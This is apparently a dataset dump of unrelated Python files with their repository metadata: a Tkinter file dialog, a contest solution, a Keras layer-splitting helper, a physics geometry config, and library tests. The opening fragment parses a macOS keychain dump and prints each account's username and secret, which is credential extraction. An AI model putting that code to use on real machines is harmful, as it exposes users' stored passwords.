find_account = re.compile('0x00000007\s\<blob\>\=\"([^\"]+)\"\n.*\n.*\"acct\"\<blob\>\=\"([^\"]+)\"\n.*\n.*\n.*\n\s+\"desc\"\<blob\>\=([^\n]+)\n.*\n.*\n.*\n.*\n.*\n.*\n.*\n.*\n.*\ndata\:\n([^\n]+)')
accounts = find_account.findall(keychain[0])
for account in accounts:
print("System: " + account[0])
print("Description: " + account[2])
print("Username: " + account[1])
print("Secret: " + account[3])
"""
return script
| [
"[email protected]"
] | |
c1f9bdee162eb8870f5e99d07e1132ddbc03d481 | 2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae | /python/python_14019.py | 78da2db51c32750262ee6905da1673496452c3d7 | [] | no_license | AK-1121/code_extraction | cc812b6832b112e3ffcc2bb7eb4237fd85c88c01 | 5297a4a3aab3bb37efa24a89636935da04a1f8b6 | refs/heads/master | 2020-05-23T08:04:11.789141 | 2015-10-22T19:19:40 | 2015-10-22T19:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 52 | py | # If comparison statements in Python
random.randint
| [
"[email protected]"
] | |
25e0f060c6bbb381ef0adce82ef475fb49accea2 | 7a23870e9b0b56b112f634d26760282ff7a4f46c | /Projects/Archived Tk code/From extensions folder/Pmw/Pmw_1_3/contrib/PmwFileDialog.py | b11001ca1e80505bdb49d27b9cd04f81218da196 | [] | no_license | leo-editor/leo-editor-contrib | 0c671998c4ec7fd7c4ce890a201395afe340481b | 28c22721e1bc313c120a8a6c288893bc566a5c67 | refs/heads/master | 2023-06-25T04:28:54.520792 | 2023-06-14T20:18:12 | 2023-06-14T20:18:12 | 16,771,641 | 6 | 6 | null | 2023-06-09T11:26:42 | 2014-02-12T15:28:36 | Python | UTF-8 | Python | false | false | 14,836 | py | #
__version__ = '$Id: PmwFileDialog.py,v 1.1 2007/12/13 16:06:01 edream Exp $'
#
# Filename dialogs using Pmw
#
# (C) Rob W.W. Hooft, Nonius BV, 1998
#
# Modifications:
#
# J. Willem M. Nissink, Cambridge Crystallographic Data Centre, 8/2002
# Added optional information pane at top of dialog; if option
# 'info' is specified, the text given will be shown (in blue).
# Modified example to show both file and directory-type dialog
#
# No Guarantees. Distribute Freely.
# Please send bug-fixes/patches/features to <[email protected]>
#
################################################################################
import os,fnmatch,time
import Tkinter,Pmw
#Pmw.setversion("0.8.5")
def _errorpop(master, text):
    """Show a modal "Error" message dialog with the given text, then
    dispose of the dialog once the user dismisses it."""
    dialog = Pmw.MessageDialog(
        master, title="Error", message_text=text, buttons=("OK",))
    dialog.component('message').pack(ipadx=15, ipady=15)
    dialog.activate()
    dialog.destroy()
class PmwFileDialog(Pmw.Dialog):
    """File Dialog using Pmw.

    NOTE: this is Python 2 code (see the `except os.error,arg` syntax in
    fillit()). The dialog shows a directory combobox, a directory list, a
    file list, a filter entry and a filename entry; askfilename() is the
    public entry point."""
    def __init__(self, parent = None, **kw):
        # Define the megawidget options.
        optiondefs = (
            ('filter', '*', self.newfilter),
            ('directory', os.getcwd(), self.newdir),
            ('filename', '', self.newfilename),
            ('historylen',10, None),
            ('command', None, None),
            ('info', None, None),
        )
        self.defineoptions(kw, optiondefs)

        # Initialise base class (after defining options).
        Pmw.Dialog.__init__(self, parent)
        self.withdraw()

        # Create the components.
        interior = self.interior()

        # Optional info banner at the top; when present every other row
        # is shifted down by one.
        if self['info'] is not None:
            rowoffset=1
            dn = self.infotxt()
            dn.grid(row=0,column=0,columnspan=2,padx=3,pady=3)
        else:
            rowoffset=0

        dn = self.mkdn()
        dn.grid(row=0+rowoffset,column=0,columnspan=2,padx=3,pady=3)
        del dn

        # Create the directory list component.
        dnb = self.mkdnb()
        dnb.grid(row=1+rowoffset,column=0,sticky='news',padx=3,pady=3)
        del dnb

        # Create the filename list component.
        fnb = self.mkfnb()
        fnb.grid(row=1+rowoffset,column=1,sticky='news',padx=3,pady=3)
        del fnb

        # Create the filter entry
        ft = self.mkft()
        ft.grid(row=2+rowoffset,column=0,columnspan=2,padx=3,pady=3)
        del ft

        # Create the filename entry
        fn = self.mkfn()
        fn.grid(row=3+rowoffset,column=0,columnspan=2,padx=3,pady=3)
        fn.bind('<Return>',self.okbutton)
        del fn

        # Buttonbox already exists
        bb=self.component('buttonbox')
        bb.add('OK',command=self.okbutton)
        bb.add('Cancel',command=self.cancelbutton)
        del bb

        Pmw.alignlabels([self.component('filename'),
                         self.component('filter'),
                         self.component('dirname')])

    def infotxt(self):
        """ Make information block component at the top """
        return self.createcomponent(
            'infobox',
            (), None,
            Tkinter.Label, (self.interior(),),
            width=51,
            relief='groove',
            foreground='darkblue',
            justify='left',
            text=self['info']
        )

    def mkdn(self):
        """Make directory name component"""
        return self.createcomponent(
            'dirname',
            (), None,
            Pmw.ComboBox, (self.interior(),),
            entryfield_value=self['directory'],
            entryfield_entry_width=40,
            entryfield_validate=self.dirvalidate,
            selectioncommand=self.setdir,
            labelpos='w',
            label_text='Directory:')

    def mkdnb(self):
        """Make directory name box"""
        return self.createcomponent(
            'dirnamebox',
            (), None,
            Pmw.ScrolledListBox, (self.interior(),),
            label_text='directories',
            labelpos='n',
            hscrollmode='none',
            dblclickcommand=self.selectdir)

    def mkft(self):
        """Make filter"""
        return self.createcomponent(
            'filter',
            (), None,
            Pmw.ComboBox, (self.interior(),),
            entryfield_value=self['filter'],
            entryfield_entry_width=40,
            selectioncommand=self.setfilter,
            labelpos='w',
            label_text='Filter:')

    def mkfnb(self):
        """Make filename list box"""
        return self.createcomponent(
            'filenamebox',
            (), None,
            Pmw.ScrolledListBox, (self.interior(),),
            label_text='files',
            labelpos='n',
            hscrollmode='none',
            selectioncommand=self.singleselectfile,
            dblclickcommand=self.selectfile)

    def mkfn(self):
        """Make file name entry"""
        return self.createcomponent(
            'filename',
            (), None,
            Pmw.ComboBox, (self.interior(),),
            entryfield_value=self['filename'],
            entryfield_entry_width=40,
            entryfield_validate=self.filevalidate,
            selectioncommand=self.setfilename,
            labelpos='w',
            label_text='Filename:')

    def dirvalidate(self,string):
        # Entry validator: only an existing directory is acceptable.
        if os.path.isdir(string):
            return Pmw.OK
        else:
            return Pmw.PARTIAL

    def filevalidate(self,string):
        # Entry validator: empty -> incomplete; an existing plain file -> OK;
        # an existing non-file (e.g. directory) -> incomplete; a
        # non-existent name -> OK (the file may be created).
        if string=='':
            return Pmw.PARTIAL
        elif os.path.isfile(string):
            return Pmw.OK
        elif os.path.exists(string):
            return Pmw.PARTIAL
        else:
            return Pmw.OK

    def okbutton(self):
        """OK action: user thinks he has input valid data and wants to
        proceed. This is also called by <Return> in the filename entry"""
        fn=self.component('filename').get()
        self.setfilename(fn)
        if self.validate(fn):
            self.canceled=0
            self.deactivate()

    def cancelbutton(self):
        """Cancel the operation"""
        self.canceled=1
        self.deactivate()

    def tidy(self,w,v):
        """Insert text v into the entry and at the top of the list of
        the combobox w, remove duplicates"""
        if not v:
            return
        entry=w.component('entry')
        entry.delete(0,'end')
        entry.insert(0,v)
        list=w.component('scrolledlist')
        list.insert(0,v)
        index=1
        while index<list.index('end'):
            k=list.get(index)
            if k==v or index>self['historylen']:
                list.delete(index)
            else:
                index=index+1
        w.checkentry()

    def setfilename(self,value):
        # Normalise the value against the current directory and update both
        # the 'directory' and 'filename' options; fires the optional
        # 'command' callback afterwards.
        if not value:
            return
        value=os.path.join(self['directory'],value)
        dir,fil=os.path.split(value)
        self.configure(directory=dir,filename=value)

        c=self['command']
        if callable(c):
            c()

    def newfilename(self):
        """Make sure a newly set filename makes it into the combobox list"""
        self.tidy(self.component('filename'),self['filename'])

    def setfilter(self,value):
        self.configure(filter=value)

    def newfilter(self):
        """Make sure a newly set filter makes it into the combobox list"""
        self.tidy(self.component('filter'),self['filter'])
        self.fillit()

    def setdir(self,value):
        self.configure(directory=value)

    def newdir(self):
        """Make sure a newly set dirname makes it into the combobox list"""
        self.tidy(self.component('dirname'),self['directory'])
        self.fillit()

    def singleselectfile(self):
        """Single click in file listbox. Move file to "filename" combobox"""
        cs=self.component('filenamebox').curselection()
        if cs!=():
            value=self.component('filenamebox').get(cs)
            self.setfilename(value)

    def selectfile(self):
        """Take the selected file from the filename, normalize it, and OK"""
        self.singleselectfile()
        value=self.component('filename').get()
        self.setfilename(value)
        if value:
            self.okbutton()

    def selectdir(self):
        """Take selected directory from the dirnamebox into the dirname"""
        cs=self.component('dirnamebox').curselection()
        if cs!=():
            value=self.component('dirnamebox').get(cs)
            dir=self['directory']
            if not dir:
                dir=os.getcwd()
            if value:
                # '..' walks one level up; anything else descends into it.
                if value=='..':
                    dir=os.path.split(dir)[0]
                else:
                    dir=os.path.join(dir,value)
            self.configure(directory=dir)
            self.fillit()

    def askfilename(self,directory=None,filter=None):
        """The actual client function. Activates the dialog, and
        returns only after a valid filename has been entered
        (return value is that filename) or when canceled (return
        value is None)"""
        if directory!=None:
            self.configure(directory=directory)
        if filter!=None:
            self.configure(filter=filter)
        self.fillit()
        self.canceled=1 # Needed for when user kills dialog window
        self.activate()
        if self.canceled:
            return None
        else:
            return self.component('filename').get()

    # Cached state used by fillit() so the directory is not re-read when
    # nothing relevant has changed since the last fill.
    lastdir=""
    lastfilter=None
    lasttime=0
    def fillit(self):
        """Get the directory list and show it in the two listboxes"""
        # Do not run unnecesarily
        if self.lastdir==self['directory'] and self.lastfilter==self['filter'] and self.lasttime>os.stat(self.lastdir)[8]:
            return
        self.lastdir=self['directory']
        self.lastfilter=self['filter']
        self.lasttime=time.time()
        dir=self['directory']
        if not dir:
            dir=os.getcwd()
        dirs=['..']
        files=[]
        try:
            fl=os.listdir(dir)
            fl.sort()
        except os.error,arg:
            # Python 2 except syntax. errno 2 (ENOENT) and 20 (ENOTDIR)
            # simply leave the listboxes unchanged; anything else is re-raised.
            if arg[0] in (2,20):
                return
            raise
        for f in fl:
            if os.path.isdir(os.path.join(dir,f)):
                dirs.append(f)
            else:
                filter=self['filter']
                if not filter:
                    filter='*'
                if fnmatch.fnmatch(f,filter):
                    files.append(f)
        self.component('filenamebox').setlist(files)
        self.component('dirnamebox').setlist(dirs)

    def validate(self,filename):
        """Validation function. Should return 1 if the filename is valid,
        0 if invalid. May pop up dialogs to tell user why. Especially
        suited to subclasses: i.e. only return 1 if the file does/doesn't
        exist"""
        return 1
class PmwDirDialog(PmwFileDialog):
"""Directory Dialog using Pmw"""
def __init__(self, parent = None, **kw):
# Define the megawidget options.
optiondefs = (
('directory', os.getcwd(), self.newdir),
('historylen',10, None),
('command', None, None),
('info', None, None),
)
self.defineoptions(kw, optiondefs)
# Initialise base class (after defining options).
Pmw.Dialog.__init__(self, parent)
self.withdraw()
# Create the components.
interior = self.interior()
if self['info'] is not None:
rowoffset=1
dn = self.infotxt()
dn.grid(row=0,column=0,columnspan=2,padx=3,pady=3)
else:
rowoffset=0
dn = self.mkdn()
dn.grid(row=1+rowoffset,column=0,columnspan=2,padx=3,pady=3)
dn.bind('<Return>',self.okbutton)
del dn
# Create the directory list component.
dnb = self.mkdnb()
dnb.grid(row=0+rowoffset,column=0,columnspan=2,sticky='news',padx=3,pady=3)
del dnb
# Buttonbox already exists
bb=self.component('buttonbox')
bb.add('OK',command=self.okbutton)
bb.add('Cancel',command=self.cancelbutton)
del bb
lastdir=""
def fillit(self):
"""Get the directory list and show it in the two listboxes"""
# Do not run unnecesarily
if self.lastdir==self['directory']:
return
self.lastdir=self['directory']
dir=self['directory']
if not dir:
dir=os.getcwd()
dirs=['..']
try:
fl=os.listdir(dir)
fl.sort()
except os.error,arg:
if arg[0] in (2,20):
return
raise
for f in fl:
if os.path.isdir(os.path.join(dir,f)):
dirs.append(f)
self.component('dirnamebox').setlist(dirs)
def okbutton(self):
"""OK action: user thinks he has input valid data and wants to
proceed. This is also called by <Return> in the dirname entry"""
fn=self.component('dirname').get()
self.configure(directory=fn)
if self.validate(fn):
self.canceled=0
self.deactivate()
def askfilename(self,directory=None):
"""The actual client function. Activates the dialog, and
returns only after a valid filename has been entered
(return value is that filename) or when canceled (return
value is None)"""
if directory!=None:
self.configure(directory=directory)
self.fillit()
self.activate()
if self.canceled:
return None
else:
return self.component('dirname').get()
def dirvalidate(self,string):
if os.path.isdir(string):
return Pmw.OK
elif os.path.exists(string):
return Pmw.PARTIAL
else:
return Pmw.OK
def validate(self,filename):
"""Validation function. Should return 1 if the filename is valid,
0 if invalid. May pop up dialogs to tell user why. Especially
suited to subclasses: i.e. only return 1 if the file does/doesn't
exist"""
if filename=='':
_errorpop(self.interior(),"Empty filename")
return 0
if os.path.isdir(filename) or not os.path.exists(filename):
return 1
else:
_errorpop(self.interior(),"This is not a directory")
return 0
class PmwExistingFileDialog(PmwFileDialog):
    # File dialog that only accepts a plain file that already exists.
    def filevalidate(self,string):
        # Entry validator: only an existing plain file is acceptable.
        if os.path.isfile(string):
            return Pmw.OK
        else:
            return Pmw.PARTIAL

    def validate(self,filename):
        # Final check on OK: 1 for an existing plain file; otherwise pop an
        # explanatory error dialog and return 0.
        if os.path.isfile(filename):
            return 1
        elif os.path.exists(filename):
            _errorpop(self.interior(),"This is not a plain file")
            return 0
        else:
            _errorpop(self.interior(),"Please select an existing file")
            return 0
class PmwExistingDirDialog(PmwDirDialog):
    """Directory dialog that only accepts a directory that already exists."""
    def dirvalidate(self,string):
        # Unlike PmwDirDialog, a non-existent path is not acceptable here.
        if os.path.isdir(string):
            return Pmw.OK
        else:
            return Pmw.PARTIAL

    def validate(self,filename):
        """Return 1 for an existing directory; otherwise pop an explanatory
        error dialog and return 0."""
        if os.path.isdir(filename):
            return 1
        elif os.path.exists(filename):
            _errorpop(self.interior(),"This is not a directory")
            return 0
        else:
            _errorpop(self.interior(),"Please select an existing directory")
            # Bug fix: this branch previously fell through and returned
            # None; return 0 explicitly, matching
            # PmwExistingFileDialog.validate.
            return 0
if __name__=="__main__":
root=Tkinter.Tk()
root.withdraw()
Pmw.initialise()
f0=PmwFileDialog(root)
f0.title('File name dialog')
n=f0.askfilename()
print '\nFilename : ',repr(n),'\n'
f1=PmwDirDialog(root,info='This is a directory dialog')
f1.title('Directory name dialog')
while 1:
n=f1.askfilename()
if n is None:
break
print "Dirname : ",repr(n)
| [
"[email protected]"
] | |
efa55d788ff68fe0cf919b7a45220e24baccb822 | 2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae | /python/python_25489.py | 0e0cbd91234b9936d47833c2c46fd67b71ab0056 | [] | no_license | AK-1121/code_extraction | cc812b6832b112e3ffcc2bb7eb4237fd85c88c01 | 5297a4a3aab3bb37efa24a89636935da04a1f8b6 | refs/heads/master | 2020-05-23T08:04:11.789141 | 2015-10-22T19:19:40 | 2015-10-22T19:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 33 | py | # y = 3 (#This is not a comment)
| [
"[email protected]"
] | |
b9c35bacbba1122e7bf5ad1531e085007384e51a | f023692f73992354a0b7823d9c49ae730c95ab52 | /AtCoderRegularContest/132/C.py | 3e94b88d37560e4a0f7c839099cf78a2907fed1a | [] | no_license | corutopi/AtCorder_python | a959e733f9a3549fab7162023e414ac2c99c4abe | a2c78cc647076071549e354c398155a65d5e331a | refs/heads/master | 2023-08-31T09:40:35.929155 | 2023-08-20T06:19:35 | 2023-08-20T06:19:35 | 197,030,129 | 1 | 0 | null | 2022-06-22T04:06:28 | 2019-07-15T15:57:34 | Python | UTF-8 | Python | false | false | 1,979 | py | """
解説AC
変則dp
"""
# import sys
# sys.setrecursionlimit(10 ** 6)
# # for pypy
# import pypyjit
# pypyjit.set_param('max_unroll_recursion=-1')
# import bisect
# from collections import deque
# import string
from math import ceil, floor
inf = float('inf')
mod = 10 ** 9 + 7
mod2 = 998244353
# from decorator import stop_watch
#
#
# @stop_watch
def solve(N, D, A):
    """Bitmask DP over a sliding window of width 2*D+1 (ARC132 C).

    A[i] == -1 means position i is free; otherwise it is fixed. Each
    placed value must stay within distance D of its index. Positions are
    padded with D fixed sentinels on each side; bit j of a DP state says
    whether index i + j - D - 1 has already been assigned. Prints the
    number of valid assignments modulo mod2 (998244353, module-level).
    """
    A = [i for i in range(D)] + [a + D - 1 if a != -1 else a for a in A] + \
        [N + D + i for i in range(D)]
    used = [0] * len(A)
    for a in A:
        used[a] = 1 if a != -1 else used[a]
    dp = [0] * 2 ** (2 * D + 1)
    dp[(1 << (D + 1)) - 1] = 1
    for i in range(D, N + D):
        dp_new = [0] * 2 ** (2 * D + 1)
        for j in range(2 ** (2 * D + 1)):
            # Skip states where i - D - 1 is still unused.
            # Without this pruning, Python is too slow to pass.
            if not j & 1: continue
            if A[i] != -1:
                # Case: the value at position i is fixed.
                if not (j >> (A[i] - i + D + 1) & 1):
                    tmp = j >> 1 | 1 << (A[i] - i + D)
                    dp_new[tmp] += dp[j]
                    dp_new[tmp] %= mod2
            else:
                # Case: the position is free (-1); try every offset k.
                for k in range(2 * D + 1):
                    if used[i + k - D]: continue  # value already taken by a fixed slot
                    if not (j >> (k + 1)) & 1:
                        tmp = j >> 1 | 1 << k
                        dp_new[tmp] += dp[j]
                        dp_new[tmp] %= mod2
        dp = dp_new
    print(sum(dp))
if __name__ == '__main__':
    # S = input()
    # N = int(input())
    # Read N, D and the sequence A (-1 marks an unfixed position) from stdin.
    N, D = map(int, input().split())
    A = [int(i) for i in input().split()]
    solve(N, D, A)
# # test
# from random import randint
# import string
# import tool.testcase as tt
# from tool.testcase import random_str, random_ints
# solve()
| [
"[email protected]"
] | |
069869c1802fa40cf5d5a5437907958a0bfa9e2d | ad13583673551857615498b9605d9dcab63bb2c3 | /output/instances/nistData/list/nonNegativeInteger/Schema+Instance/NISTXML-SV-IV-list-nonNegativeInteger-enumeration-3-1.py | 0a96f1ef465b374d9e5d0791ff5bc20220dcdd83 | [
"MIT"
] | permissive | tefra/xsdata-w3c-tests | 397180205a735b06170aa188f1f39451d2089815 | 081d0908382a0e0b29c8ee9caca6f1c0e36dd6db | refs/heads/main | 2023-08-03T04:25:37.841917 | 2023-07-29T17:10:13 | 2023-07-30T12:11:13 | 239,622,251 | 2 | 0 | MIT | 2023-07-25T14:19:04 | 2020-02-10T21:59:47 | Python | UTF-8 | Python | false | false | 695 | py | from output.models.nist_data.list_pkg.non_negative_integer.schema_instance.nistschema_sv_iv_list_non_negative_integer_enumeration_3_xsd.nistschema_sv_iv_list_non_negative_integer_enumeration_3 import NistschemaSvIvListNonNegativeIntegerEnumeration3
from output.models.nist_data.list_pkg.non_negative_integer.schema_instance.nistschema_sv_iv_list_non_negative_integer_enumeration_3_xsd.nistschema_sv_iv_list_non_negative_integer_enumeration_3 import NistschemaSvIvListNonNegativeIntegerEnumeration3Type
obj = NistschemaSvIvListNonNegativeIntegerEnumeration3(
value=NistschemaSvIvListNonNegativeIntegerEnumeration3Type.VALUE_693_7324_20_7475_4947489_80584759_9768357488_66469880_746558290
)
| [
"[email protected]"
] | |
a99e5fd938668998f40d71595197fe4eabfea880 | 7cd36fa026bb922e438905819e97d7ed208dc49e | /examples/advanced/thinplate_morphing.py | d0515987197e12cfdcdd0e91e7e65d6ca9ab8b07 | [
"MIT"
] | permissive | lxychuanhai/vtkplotter | b267bfcbbee5c7733ac98f5327e311c9529c74b1 | bc1b8b8821095263a46bba20ca345cab1d70cc42 | refs/heads/master | 2020-11-25T15:25:33.597049 | 2019-12-17T18:49:05 | 2019-12-17T18:49:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 808 | py | """
Warp the tip of a mesh using Thin Plate Splines.
Red points stay fixed while a single point in space
moves as the arrow shows.
"""
from vtkplotter import *

mesh = load(datadir+"man.vtk").normalize()
# TPS is computed on the decimated copy for speed, then applied to the
# full-resolution mesh.
meshd = mesh.clone().decimate(N=100) # a heavily decimated copy

sources = [[0.0, 1.0, 0.2]] # this point moves
targets = [[0.3, 1.3, 0.4]] # to this.

for pt in meshd.getPoints():
    if pt[1] < 0.3: # these pts don't move
        sources.append(pt) # source = target
        targets.append(pt)

# calculate the warping T on the reduced mesh
T = thinPlateSpline(meshd, sources, targets).getTransform()

# Apply the transform to the full-resolution mesh and overlay it in blue.
warp = mesh.clone().transformMesh(T).c("blue").alpha(0.4)
apts = Points(sources).c("red")
arro = Arrow(sources[0], targets[0])

show(mesh, arro, warp, apts, Text(__doc__), viewup="z", axes=1)
| [
"[email protected]"
] | |
1d94a7aaf0160f003ff3934bba18e8f21ae50052 | 69a576aa60918b3b846963da2238931468e354ab | /utils/spatial.py | 48c11f134472aad99921594a9b5bfddc25d536b5 | [] | no_license | parallel-ml/stand-alone | 3d04a31d442bf422d67d2f0a1f03eb04bdb841c7 | c86ce0d632188e9e16fb5539a7e2baed2c40ecdb | refs/heads/master | 2020-03-29T10:49:48.426742 | 2018-11-20T16:40:35 | 2018-11-20T16:40:35 | 149,824,728 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,044 | py | """
This module implements single Conv2D layer spatial split.
It provides an example of 2 division and another generalized
example. The arithmetic technique is discussed in 2 division
example.
"""
from keras.layers import Conv2D, Lambda, ZeroPadding2D
from keras.layers.merge import Concatenate
import keras.backend as K
import math
def split_xy(X, kernal, strides, padding, num):
    """ A general function for split tensors with different shapes.

    Splits the spatial plane of a 4-D tensor into a num x num grid of
    overlapping tiles, sized so that running the same `kernal`/`strides`
    convolution (with 'valid' padding) on each tile reproduces the
    corresponding tile of the full convolution output.

    NOTE(review): assumes channels-last layout, i.e. K.int_shape(X) is
    (batch, W, H, channels) -- confirm against the calling model.
    NOTE(review): the `/` divisions below rely on Python 2 integer
    division; under Python 3 they produce floats -- confirm target version.
    """
    # take care of padding here and set padding of conv always to be valid
    if padding == 'same':
        wk, hk = kernal
        ws, hs = strides
        _, W, H, _ = K.int_shape(X)
        # 'same' output size: ceil(W / ws), ceil(H / hs).
        ow, oh = W / ws, H / hs
        if W % ws != 0:
            ow += 1
        if H % hs != 0:
            oh += 1
        # Total padding needed on each spatial axis.
        wp, hp = (ow - 1) * ws + wk - W, (oh - 1) * hs + hk - H
        wp, hp = wp if wp >= 0 else 0, hp if hp >= 0 else 0
        # NOTE(review): ZeroPadding2D's padding tuples apply to dims 1 and 2
        # in order; here hp is applied to dim 1 and wp to dim 2, which only
        # matches the W/H naming above for square inputs -- verify.
        X = ZeroPadding2D(padding=((hp / 2, hp - hp / 2), (wp / 2, wp - wp / 2)))(X)

    wk, hk = kernal
    ws, hs = strides
    _, W, H, _ = K.int_shape(X)
    # output size
    ow, oh = (W - wk) / ws + 1, (H - hk) / hs + 1
    # calculate boundary for general chunk
    wchunk, hchunk = ow / num, oh / num
    rw, rh = (wchunk - 1) * ws + wk, (hchunk - 1) * hs + hk
    # calculate special boundary for last chunk
    wlchunk, hlchunk = ow - (num - 1) * wchunk, oh - (num - 1) * hchunk
    lrw, lrh = (wlchunk - 1) * ws + wk, (hlchunk - 1) * hs + hk

    # Input rows overlap by (kernel - stride) between neighbouring chunks.
    offset = lambda kernals, strides, i: (kernals - strides) * i if kernals - strides > 0 else 0

    # create a list of tuple with boundary (left, right, up, down)
    boundary = []
    for r in range(num):
        for c in range(num):
            if r == num - 1 and c == num - 1:
                boundary.append((W - lrw, W, H - lrh, H))
            elif r == num - 1:
                boundary.append((rw * c - offset(wk, ws, c), rw * c - offset(wk, ws, c) + rw, H - lrh, H))
            elif c == num - 1:
                boundary.append((W - lrw, W, rh * r - offset(hk, hs, r), rh * r - offset(hk, hs, r) + rh))
            else:
                boundary.append(
                    (
                        rw * c - offset(wk, ws, c),
                        rw * c - offset(wk, ws, c) + rw,
                        rh * r - offset(hk, hs, r),
                        rh * r - offset(hk, hs, r) + rh,
                    )
                )

    # Slice all tiles out of X inside a single Lambda layer.
    return Lambda(
        lambda x:
        [x[:, lb:rb, ub:db, :] for lb, rb, ub, db in boundary]
    )(X)
def merge(tensors):
    """Reassemble num*num chunk outputs into one tensor.

    Chunks are expected in row-major order; each row of chunks is first
    concatenated vertically (axis 1), then the rows are joined
    horizontally (axis 2).
    """
    grid = int(math.sqrt(len(tensors)))
    rows = []
    for r in range(grid):
        row_chunks = tensors[r * grid:r * grid + grid]
        rows.append(Concatenate(axis=1)(row_chunks))
    return Concatenate(axis=2)(rows)
def conv(tensors, filters, kernal, strides, padding, activation, name):
    """Apply one shared Conv2D layer to every chunk tensor.

    A single layer instance is created so all chunks share the same
    weights, exactly as a single un-split convolution would.
    """
    shared_layer = Conv2D(filters, kernal, strides=strides, padding=padding,
                          activation=activation, name=name + '_conv')
    outputs = []
    for chunk in tensors:
        outputs.append(shared_layer(chunk))
    return outputs
"[email protected]"
] | |
4fd1a36063610493d16705b91faca3442fdc810a | 480e33f95eec2e471c563d4c0661784c92396368 | /Geometry/HGCalCommonData/test/python/dumpTBGeometryDDD_cfg.py | 998122a85ad6a346ff919cce319dcc301f314db8 | [
"Apache-2.0"
] | permissive | cms-nanoAOD/cmssw | 4d836e5b76ae5075c232de5e062d286e2026e8bd | 4eccb8a758b605875003124dd55ea58552b86af1 | refs/heads/master-cmsswmaster | 2021-01-23T21:19:52.295420 | 2020-08-27T08:01:20 | 2020-08-27T08:01:20 | 102,867,729 | 7 | 14 | Apache-2.0 | 2022-05-23T07:58:09 | 2017-09-08T14:03:57 | C++ | UTF-8 | Python | false | false | 821 | py | import FWCore.ParameterSet.Config as cms
# CMSSW configuration that dumps the HGCal test-beam geometry to a ROOT
# file ('cms' is imported on the first line of this file).
process = cms.Process("DUMP")

# Test-beam (TB181) HGCal geometry described in DDD XML.
process.load("Geometry.HGCalCommonData.testTB181XML_cfi")
process.load('FWCore.MessageService.MessageLogger_cfi')

# Route Geant4 and HGCal-geometry message categories through the
# MessageLogger when the service is configured.
if 'MessageLogger' in process.__dict__:
    process.MessageLogger.categories.append('G4cerr')
    process.MessageLogger.categories.append('G4cout')
    process.MessageLogger.categories.append('HGCalGeom')

# No event data needed: one empty event is enough to trigger the dump.
process.source = cms.Source("EmptySource")
process.maxEvents = cms.untracked.PSet(
    input = cms.untracked.int32(1)
)

# Build the TGeo representation from the DDD description.
# NOTE(review): level 14 presumably bounds the traversal depth — confirm
# against the TGeoMgrFromDdd producer documentation.
process.add_(cms.ESProducer("TGeoMgrFromDdd",
    verbose = cms.untracked.bool(False),
    level = cms.untracked.int32(14)
))

# Write the simulation geometry to TBGeom.root.
process.dump = cms.EDAnalyzer("DumpSimGeometry",
    outputFileName = cms.untracked.string('TBGeom.root'))
process.p = cms.Path(process.dump)
| [
"[email protected]"
] | |
37483fd1e0d9006657489d14e97b898faed7670f | 45de7d905486934629730945619f49281ad19359 | /xlsxwriter/test/worksheet/test_cond_format22.py | 4c5f28418e89a70c30d923a17b0cf44b9f5c802f | [
"BSD-2-Clause"
] | permissive | jmcnamara/XlsxWriter | 599e1d225d698120ef931a776a9d93a6f60186ed | ab13807a1be68652ffc512ae6f5791d113b94ee1 | refs/heads/main | 2023-09-04T04:21:04.559742 | 2023-08-31T19:30:52 | 2023-08-31T19:30:52 | 7,433,211 | 3,251 | 712 | BSD-2-Clause | 2023-08-28T18:52:14 | 2013-01-04T01:07:06 | Python | UTF-8 | Python | false | false | 8,726 | py | ###############################################################################
#
# Tests for XlsxWriter.
#
# SPDX-License-Identifier: BSD-2-Clause
# Copyright (c), 2013-2023, John McNamara, [email protected]
#
import unittest
from io import StringIO
from ..helperfunctions import _xml_to_list
from ...worksheet import Worksheet
class TestAssembleWorksheet(unittest.TestCase):
    """
    Test assembling a complete Worksheet file.
    """

    def test_assemble_xml_file(self):
        """Test writing a worksheet with icon-set conditional formatting."""
        self.maxDiff = None

        fh = StringIO()
        worksheet = Worksheet()
        worksheet._set_filehandle(fh)
        worksheet.select()

        # One (cell, icon_style) pair per worksheet row; the cell value is
        # its row number.  This replaces nine near-identical pairs of
        # write() / conditional_format() statements.
        cases = [
            ("A1", "3_arrows"),
            ("A2", "3_flags"),
            ("A3", "3_traffic_lights_rimmed"),
            ("A4", "3_symbols_circled"),
            ("A5", "4_arrows"),
            ("A6", "4_red_to_black"),
            ("A7", "4_traffic_lights"),
            ("A8", "5_arrows_gray"),
            ("A9", "5_quarters"),
        ]

        # Same call order as before: all writes first, then the formats,
        # so the cfRule priority numbers (assigned in call order) match
        # the expected XML below.
        for value, (cell, _) in enumerate(cases, start=1):
            worksheet.write(cell, value)

        for cell, icon_style in cases:
            worksheet.conditional_format(
                cell, {"type": "icon_set", "icon_style": icon_style}
            )

        worksheet._assemble_xml_file()

        exp = _xml_to_list(
            """
            <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
            <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
            <dimension ref="A1:A9"/>
            <sheetViews>
            <sheetView tabSelected="1" workbookViewId="0"/>
            </sheetViews>
            <sheetFormatPr defaultRowHeight="15"/>
            <sheetData>
            <row r="1" spans="1:1">
            <c r="A1">
            <v>1</v>
            </c>
            </row>
            <row r="2" spans="1:1">
            <c r="A2">
            <v>2</v>
            </c>
            </row>
            <row r="3" spans="1:1">
            <c r="A3">
            <v>3</v>
            </c>
            </row>
            <row r="4" spans="1:1">
            <c r="A4">
            <v>4</v>
            </c>
            </row>
            <row r="5" spans="1:1">
            <c r="A5">
            <v>5</v>
            </c>
            </row>
            <row r="6" spans="1:1">
            <c r="A6">
            <v>6</v>
            </c>
            </row>
            <row r="7" spans="1:1">
            <c r="A7">
            <v>7</v>
            </c>
            </row>
            <row r="8" spans="1:1">
            <c r="A8">
            <v>8</v>
            </c>
            </row>
            <row r="9" spans="1:1">
            <c r="A9">
            <v>9</v>
            </c>
            </row>
            </sheetData>
            <conditionalFormatting sqref="A1">
            <cfRule type="iconSet" priority="1">
            <iconSet iconSet="3Arrows">
            <cfvo type="percent" val="0"/>
